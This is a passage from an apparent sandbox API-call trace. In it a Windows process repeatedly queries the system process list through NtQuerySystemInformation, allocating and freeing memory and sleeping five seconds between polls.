returned 0x0 [0267.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.518] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.548] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.564] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.571] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.591] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.598] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.638] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.645] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.661] NtQuerySystemInformation (in: 